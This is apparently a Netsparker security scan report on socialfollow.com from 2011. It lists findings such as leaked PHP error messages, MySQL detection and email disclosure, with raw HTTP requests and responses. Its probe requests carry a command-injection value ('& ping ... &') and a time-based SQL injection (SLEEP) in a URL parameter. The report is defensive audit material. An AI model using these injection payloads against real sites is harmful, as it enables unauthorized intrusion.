imgs=this.getElementsByClass(targetclass);for(var i=0;i<imgs.length;i++){if('done'!=imgs[i].getAttribute('rel')){imgs[i].setAttribute('rel','done');this.setupmenu(targetclass,imgs[i],i);this.border="0";var hidden_divs=this.getElementsByClass('show');setTimeout(function(){for(var i=0;i<hidden_divs.length;i++){if('undefined'!=typeof(hidden_divs[i].style))hidden_divs[i].style.display='';}},200);}}}}function openwindow(url){document.body.removeChild(document.getElementById('popup'));document.body.removeChild(document.getElementById('popup1'));window.open(url);}function check_browser(){var re=/\s+(X?HTML)\s+([\d\.]+)\s*([^\/]+)*\/(?:[^"]+"\s"([^"]+)")?/gi;var res=false;metaCollection=document.getElementsByTagName('meta');for(i=0;i<metaCollection.length;i++){if('X-UA-Compatible'==metaCollection[i].httpEquiv&&'IE=EmulateIE7'==metaCollection[i].content)return false;}if(typeof document.namespaces!="undefined"){res=(8==document.all[0].nodeType)?re.test(document.all[0].nodeValue):false;}else{res=(null!=document.doctype)?re.test(document.doctype.publicId):false;}if(res){res=new Object();var type=RegExp.$1;var version=RegExp.$2;var doctype_extended=RegExp.$3.toLowerCase();var doctype_url=RegExp.$4if((/strict\.dtd/.test(doctype_url)||'strict'==doctype_extended)||(('HTML'==type&&'4.01'==version)&&!/http:\/\//.test(doctype_url)))return false;return(('XHTML'==type&&'1.0'==version)||('HTML'==type&&'4.01'==version))?true:false;return result;}else{return false;}}
Programming Error Message

Programming Error Message

1 TOTAL
LOW
Netsparker identified a programming error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. Source code, stack trace, etc. type data may be disclosed. Most of these issues will be identified and reported separately by Netsparker.

Remedy

Do not provide error messages on production environments. Save error messages with a reference number to a backend storage such as a log, text file or database then show this number and a static user-friendly error message to the user.
- /button/image/

/button/image/

http://www.socialfollow.com/button/image/?b=%22%26%20ping%20-n%2026%20127.0.0.1%20%26

Parameters

Parameter Type Value
b GET "& ping -n 26 127.0.0.1 &

Identified Error Message

  • <b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>3</b>
  • <b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>5</b>
  • <b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>6</b>
  • <b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>7</b>
  • <b>Warning</b>: file_get_contents(../../images/button/.gif) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: No such file or directory in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>8</b>

Request

GET /button/image/?b=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:18:09 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 1288
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


<br /><b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>3</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>5</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>6</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>7</b><br /><br /><b>Warning</b>: file_get_contents(../../images/button/.gif) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: No such file or directory in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>8</b><br />
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /js/

/js/ CONFIRMED

http://www.socialfollow.com/js/

Request

GET /js/ HTTP/1.1
Referer: http://www.socialfollow.com/js/flash-detect.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Content-Length: 387
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /js/on this server.</p><hr><address>Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 Server at www.socialfollow.com Port 80</address></body></html>
MySQL Database Identified

MySQL Database Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes.

Impact

This issue is reported as additional information only, there is no direct impact arising from this issue.
- /button/image/

/button/image/ CONFIRMED

http://www.socialfollow.com/button/image/?b=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+

Request

GET /button/image/?b=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:18:15 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Last-Modified: Tue, 19 Apr 2011 20:18:40 -0500
Accept-Ranges: bytes
Content-Length: 1190
Keep-Alive: timeout=2, max=99
Connection: Keep-Alive
Content-Type: image/gif


E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /blog/c/future-features/

/blog/c/future-features/

http://www.socialfollow.com/blog/c/future-features/

Found E-mails

geoff@deconcept.com

Request

GET /blog/c/future-features/ HTTP/1.1
Referer: http://www.socialfollow.com/sitemap.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:33 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://www.socialfollow.com/blog/xmlrpc.php
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profile="http://gmpg.org/xfn/11"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Future Features - Social Follow</title><meta name="blogcatalog" content="9BC9225160" /> <link rel="stylesheet" href="http://www.socialfollow.com/blog/wp-content/themes/social-follow-theme2/style.css" type="text/css" media="screen" /><link rel="alternate" type="application/rss+xml" title="Social Follow RSS Feed" href="http://www.socialfollow.com/blog/feed/" /><link rel="alternate" type="application/atom+xml" title="Social Follow Atom Feed" href="http://www.socialfollow.com/blog/feed/atom/" /><link rel="pingback" href="http://www.socialfollow.com/blog/xmlrpc.php" /><link rel="icon" href="/favicon.ico" type="image/x-icon"/><!-- META Tags added by Add-Meta-Tags WordPress plugin. Get it at: http://www.g-loaded.eu/ --><meta name="keywords" content="future features" /><link rel="alternate" type="application/rss+xml" title="Social Follow &raquo; Future Features Category Feed" href="http://www.socialfollow.com/blog/c/future-features/feed/" /><link rel='stylesheet' id='wp-email-css' href='http://www.socialfollow.com/blog/wp-content/plugins/wp-email/email-css.css?ver=2.50' type='text/css' media='all' /><link rel='stylesheet' id='wp-polls-css' href='http://www.socialfollow.com/blog/wp-content/plugins/wp-polls/polls-css.css?ver=2.50' type='text/css' media='all' /><link rel='stylesheet' id='wp-postratings-css' href='http://www.socialfollow.com/blog/wp-content/plugins/wp-postratings/postratings-css.css?ver=1.50' type='text/css' media='all' /><script type='text/javascript' src='http://www.socialfollow.com/blog/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.socialfollow.com/blog/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.socialfollow.com/blog/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Social Follow' href='http://www.socialfollow.com/blog/' /> <link rel="stylesheet" type="text/css" href="http://www.socialfollow.com/blog/index.php?ak_action=aktt_css&v=2.4" /> <script type="text/javascript" src="http://www.socialfollow.com/blog/index.php?ak_action=aktt_js&v=2.4"></script> <style type="text/css">.wp-polls .pollbar { margin: 1px; font-size: 6px; line-height: 8px; height: 8px; background-image: url('http://www.socialfollow.com/blog/wp-content/plugins/wp-polls/images/default/pollbg.gif'); border: 1px solid #c8c8c8;}</style></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="http://www.socialfollow.com/blog/wp-content/themes/social-follow-theme2/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button selected">Blog</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div id="page-wrapper" class="clear"> <div id="page" class="clear"> <div id="green-border" class="round-top-left"> <div class="content"> <div class="narrowcolumn"> <h1 class="pagetitle">Future Features</h1> <div class="Chicklets" style="margin:7px 0px;"> <!-- AddThis Button BEGIN --> <script type="text/javascript"> var addthis_pub="socialfollow"; var addthis_feed="http://www.socialfollow.com/blog/feed/"; </script> <a href="http://www.addthis.com/feed.php?pub=socialfollow&h1=http://www.socialfollow.com/blog/feed/&t1=" onclick="return addthis_open(this, 'feed')" title="Subscribe to Social Follow" target="_blank"><img src="http://s7.addthis.com/static/btn/lg-feed-en.gif" width="125" height="16" alt="Subscribe to Social Follow" style="border:0"/></a> <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script> <!-- AddThis Button END --> </div> <br /> <div class="post-31 post type-post hentry category-future-features tag-rafferty-pendery tag-social-follow tag-social-follow-profiles tag-social-networking-profiles"> <br /> <small>Sunday, June 14th, 2009</small> <h2 id="post-31"><a href="http://www.socialfollow.com/blog/future-features/social-follow-profile-pages-coming-soon/" rel="bookmark" title="Permanent Link to Social Follow: Profile Pages Coming Soon">Social Follow: Profile Pages Coming Soon</a></h2> <div class="entry"> <div class="tweetmeme_button" style="float: left; margin-right: 10px;"><iframe src="http://api.tweetmeme.com/button.js?url=http%3A%2F%2Fwww.socialfollow.com%2Fblog%2Ffuture-features%2Fsocial-follow-profile-pages-coming-soon%2F&amp;source=SocialFollow&amp;style=normal" height="61" width="50" frameborder="0" scrolling="no"></iframe></div><p>Social Follow has been growing rapidly, giving us a strong base of people helping us find any bugs. At this point, the Social Follow system is solid with the functionality included. Thanks to everyone!</p><p>Onto the next phase: Profile pages. We are including the functionality of being able to have a profile page for each of the Social Follow buttons you manage in your accounts. This is going to be a basic profile page to help give more points for you to attract attention about you and your business.</p><p>We have all the functionality worked out, and are shooting for having it live this next weekend.</p><p>Stay tuned!</p><p>Rafferty Pendery<br />Social Follow</p> </div> <p class="postmetadata"><span class="black">Tags:</span> <a href="http://www.socialfollow.com/blog/tag/rafferty-pendery/" rel="tag">Rafferty Pendery</a>, <a href="http://www.socialfollow.com/blog/tag/social-follow/" rel="tag">Social Follow</a>, <a href="http://www.socialfollow.com/blog/tag/social-follow-profiles/" rel="tag">Social Follow Profiles</a>, <a href="http://www.socialfollow.com/blog/tag/social-networking-profiles/" rel="tag">Social networking profiles</a><br /> <span class="black">Posted in</span> <a href="http://www.socialfollow.com/blog/c/future-features/" title="View all posts in Future Features" rel="category tag">Future Features</a> | <a href="http://www.socialfollow.com/blog/future-features/social-follow-profile-pages-coming-soon/#respond" title="Comment on Social Follow: Profile Pages Coming Soon">Leave Comment</a></p> </div> <div class="navigation"> <div class="alignleft"></div> <div class="alignright"></div> </div> </div> <div id="sidebar"> <ul> <li id="social-follow" class="widget sf_widget"><h2 class="widgettitle">Social Follow</h2><!-- Start SocialFollow.com Button Code -->
<img src="http://www.socialfollow.com/button/image/?b=1" class="socialFollowImage" alt="Follow Me!" />

<script type="text/javascript" src="http://www.socialfollow.com/button/?b=1"></script>
<script type="text/javascript">socialfollow.init("socialFollowImage");</script>
<!-- End SocialFollow.com Button Code --></li><li id="archives-2" class="widget widget_archive"><h2 class="widgettitle">Archives</h2> <ul> <li><a href='http://www.socialfollow.com/blog/2011/04/' title='April 2011'>April 2011</a></li> <li><a href='http://www.socialfollow.com/blog/2011/03/' title='March 2011'>March 2011</a></li> <li><a href='http://www.socialfollow.com/blog/2011/02/' title='February 2011'>February 2011</a></li> <li><a href='http://www.socialfollow.com/blog/2011/01/' title='January 2011'>January 2011</a></li> <li><a href='http://www.socialfollow.com/blog/2010/12/' title='December 2010'>December 2010</a></li> <li><a href='http://www.socialfollow.com/blog/2010/11/' title='November 2010'>November 2010</a></li> <li><a href='http://www.socialfollow.com/blog/2010/10/' title='October 2010'>October 2010</a></li> <li><a href='http://www.socialfollow.com/blog/2010/02/' title='February 2010'>February 2010</a></li> <li><a href='http://www.socialfollow.com/blog/2009/08/' title='August 2009'>August 2009</a></li> <li><a href='http://www.socialfollow.com/blog/2009/07/' title='July 2009'>July 2009</a></li> <li><a href='http://www.socialfollow.com/blog/2009/06/' title='June 2009'>June 2009</a></li> <li><a href='http://www.socialfollow.com/blog/2009/04/' title='April 2009'>April 2009</a></li> <li><a href='http://www.socialfollow.com/blog/2009/03/' title='March 2009'>March 2009</a></li> </ul></li><li id="categories-377264371" class="widget widget_categories"><h2 class="widgettitle">Categories</h2> <ul> <li class="cat-item cat-item-48"><a href="http://www.socialfollow.com/blog/c/analytics-2/" title="View all posts filed under Analytics">Analytics</a></li> <li class="cat-item cat-item-18"><a href="http://www.socialfollow.com/blog/c/featured/" title="View all posts filed under Featured">Featured</a></li> <li class="cat-item cat-item-3 current-cat"><a href="http://www.socialfollow.com/blog/c/future-features/" title="View all posts filed under Future Features">Future Features</a></li> <li class="cat-item cat-item-4"><a href="http://www.socialfollow.com/blog/c/new-releases/" title="View all posts filed under New Releases">New Releases</a></li> <li class="cat-item cat-item-5"><a href="http://www.socialfollow.com/blog/c/social-following/" title="View all posts filed under Social Following">Social Following</a></li> <li class="cat-item cat-item-59"><a href="http://www.socialfollow.com/blog/c/social-media-marketing-2/" title="View all posts filed under Social Media Marketing">Social Media Marketing</a></li> <li class="cat-item cat-item-44"><a href="http://www.socialfollow.com/blog/c/social-media-solutions/" title="View all posts filed under Social Media Solutions">Social Media Solutions</a></li> <li class="cat-item cat-item-60"><a href="http://www.socialfollow.com/blog/c/social-networking-2/" title="View all posts filed under Social Networking">Social Networking</a></li> <li class="cat-item cat-item-21"><a href="http://www.socialfollow.com/blog/c/tweets/" title="View all posts filed under Tweets">Tweets</a></li> </ul></li> <li id="recent-posts-2" class="widget widget_recent_entries"> <h2 class="widgettitle">Recent Posts</h2> <ul> <li><a href="http://www.socialfollow.com/blog/social-media-marketing-2/the-social-networking-squeeze-job/" title="The Social Networking Squeeze Job">The Social Networking Squeeze Job</a></li> <li><a href="http://www.socialfollow.com/blog/social-media-solutions/using-social-media-to-expand-your-nonprofit-organization/" title="Using Social Media to Expand the Reach of Your Nonprofit Organization">Using Social Media to Expand the Reach of Your Nonprofit Organization</a></li> <li><a href="http://www.socialfollow.com/blog/social-following/socially-optimized-seo-in-the-social-network/" title="Socially Optimized-SEO in the Social Network">Socially Optimized-SEO in the Social Network</a></li> <li><a href="http://www.socialfollow.com/blog/social-media-marketing-2/tips-for-the-socially-inept-basic-rules-of-networking-etiquette/" title="Tips for the Socially Inept: Basic Rules of Networking Etiquette">Tips for the Socially Inept: Basic Rules of Networking Etiquette</a></li> <li><a href="http://www.socialfollow.com/blog/social-following/social-butterfly-or-party-animal-what-is-your-social-media-marketing-plan/" title="Social Butterfly or Party Animal-What Is Your Social Media Marketing Plan?">Social Butterfly or Party Animal-What Is Your Social Media Marketing Plan?</a></li> </ul> </li> <li id="wp-cumulus" class="widget wp_cumulus_widget"> <h2 class="widgettitle">Topics</h2> <!-- SWFObject embed by Geoff Stearns geoff@deconcept.com http://blog.deconcept.com/swfobject/ --><script type="text/javascript" src="http://www.socialfollow.com/blog/wp-content/plugins/wp-cumulus/swfobject.js"></script><div id="wpcumuluswidgetcontent830033"><p style="display:none;"><a href='http://www.socialfollow.com/blog/tag/analytics/' class='tag-link-8' title='2 topics' style='font-size: 10.4705882353pt;'>analytics</a><a href='http://www.socialfollow.com/blog/tag/blogger-institute/' class='tag-link-32' title='1 topic' style='font-size: 8pt;'>Blogger Institute</a><a href='http://www.socialfollow.com/blog/tag/blogging-ot/' class='tag-link-41' title='1 topic' style='font-size: 8pt;'>Blogging OT</a><a href='http://www.socialfollow.com/blog/tag/button-placement/' class='tag-link-51' title='1 topic' style='font-size: 8pt;'>button placement</a><a href='http://www.socialfollow.com/blog/tag/definition-of-social-follow/' class='tag-link-13' title='1 topic' style='font-size: 8pt;'>Definition of Social Follow</a><a href='http://www.socialfollow.com/blog/tag/featured/' class='tag-link-18' title='5 topics' style='font-size: 14.5882352941pt;'>Featured</a><a href='http://www.socialfollow.com/blog/tag/features/' class='tag-link-42' title='1 topic' style='font-size: 8pt;'>Features</a><a href='http://www.socialfollow.com/blog/tag/fine-art-of-blogging/' class='tag-link-31' title='1 topic' style='font-size: 8pt;'>Fine Art of Blogging</a><a href='http://www.socialfollow.com/blog/tag/follow-me-button/' class='tag-link-35' title='2 topics' style='font-size: 10.4705882353pt;'>Follow Me Button</a><a href='http://www.socialfollow.com/blog/tag/go2web20net/' class='tag-link-19' title='1 topic' style='font-size: 8pt;'>Go2Web20.net</a><a href='http://www.socialfollow.com/blog/tag/interview/' class='tag-link-33' title='1 topic' style='font-size: 8pt;'>Interview</a><a href='http://www.socialfollow.com/blog/tag/kerry-jones/' class='tag-link-17' title='10 topics' style='font-size: 18.1568627451pt;'>Kerry Jones</a><a href='http://www.socialfollow.com/blog/tag/killerstartupscom/' class='tag-link-20' title='1 topic' style='font-size: 8pt;'>KillerStartups.com</a><a href='http://www.socialfollow.com/blog/tag/multiple-languages/' class='tag-link-34' title='1 topic' style='font-size: 8pt;'>Multiple Languages</a><a href='http://www.socialfollow.com/blog/tag/new-feature/' class='tag-link-36' title='2 topics' style='font-size: 10.4705882353pt;'>New Feature</a><a href='http://www.socialfollow.com/blog/tag/new-release/' class='tag-link-40' title='1 topic' style='font-size: 8pt;'>New Release</a><a href='http://www.socialfollow.com/blog/tag/plugin/' class='tag-link-39' title='1 topic' style='font-size: 8pt;'>Plugin</a><a href='http://www.socialfollow.com/blog/tag/professional-netw..
Sitemap Identified

Sitemap Identified

1 TOTAL
INFORMATION
Netsparker identified Sitemap file on the target web site. This issue is reported as extra information.

Impact

This issue is reported as extra information, there is no direct impact resulting from this.
- /sitemap.xml

/sitemap.xml

http://www.socialfollow.com/sitemap.xml

Request

GET /sitemap.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Fri, 18 Jun 2010 23:42:18 GMT
ETag: "19abdf-e460-4895681664a80"
Accept-Ranges: bytes
Content-Length: 58464
Keep-Alive: timeout=2, max=97
Connection: Keep-Alive
Content-Type: application/xml


<?xml version="1.0" encoding="UTF-8"?>
<urlset
xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
<!-- created with Free Online Sitemap Generator www.xml-sitemaps.com -->

<url>
<loc>http://www.socialfollow.com/</loc>
<changefreq>monthly</changefreq>
<priority>1.00</priority>
</url>
<url>
<loc>http://www.socialfollow.com/forgot-password.php</loc>
<changefreq>monthly</changefreq>
<priority>0.50</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/terms-and-conditions.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/privacy-policy.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/contact-us.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/sitemap.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/movingpartsaudio/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/frozenrodeo/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/theannandalecardinals/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/heartofthelakesrecords/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-special-touch/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-vintage-revolution/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/aarontimlin/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhi/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhishek/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/academy-of-life-and-leadership/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/achraf52/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/acquaspa/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adam-haider/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adamlinsley/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/login.php</loc>
<changefreq>monthly</changefreq>
<priority>0.85</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/wordpress-plugin-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/kerry-jones/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-feature/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/plugin/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/wordpress/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/server-upgrade-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-release/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-4/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-3/</loc>
<changefreq>monthly</changefreq>
